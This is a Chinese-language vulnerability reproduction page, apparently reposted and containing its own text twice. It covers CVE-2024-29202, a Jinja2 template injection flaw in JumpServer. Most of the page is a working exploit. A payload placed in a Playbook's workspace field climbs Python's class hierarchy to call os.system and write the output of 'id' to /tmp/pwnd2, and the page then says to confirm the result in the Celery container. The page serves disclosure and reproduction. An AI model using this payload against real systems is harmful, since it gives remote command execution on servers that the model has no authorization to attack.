与 CVE-2024-29201类似,进入 作业中心-模板管理 添加一个 Playbook,在 工作空间 输入的内容为:
| – name: | {% for x in ().__class__.__base__.__subclasses__() %} {% if “warning” in x.__name__ %} {{ x()._module.__builtins__[“__import__”](“os”).system(“id > /tmp/pwnd2”) }} {%endif%} {%endfor%} |
添加完成后,同样进入作业管理页面创建并运行 Playbook 作业。运行结果如下:
![图片[1]-JumpServer存在模板注入漏洞(CVE-2024-29202)-棉花糖会员站](https://oss.bdziyi.com/vip/2024/04/20240402075247174.png?imageView2/0/format/webp/q/75)
进入 Celery 容器,查看 tmp 目录下是否存在 pwnd2 文件
![图片[2]-JumpServer存在模板注入漏洞(CVE-2024-29202)-棉花糖会员站](https://oss.bdziyi.com/vip/2024/04/20240402075251684.png?imageView2/0/format/webp/q/75)
https://www.ctfiot.com/169655.html
与 CVE-2024-29201类似,进入 作业中心-模板管理 添加一个 Playbook,在 工作空间 输入的内容为:
– name: | {% for x in ().__class__.__base__.__subclasses__() %} {% if “warning” in x.__name__ %} {{ x()._module.__builtins__[“__import__”](“os”).system(“id > /tmp/pwnd2”) }} {%endif%} {%endfor%} |
添加完成后,同样进入作业管理页面创建并运行 Playbook 作业。运行结果如下:
进入 Celery 容器,查看 tmp 目录下是否存在 pwnd2 文件
https://www.ctfiot.com/169655.html
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容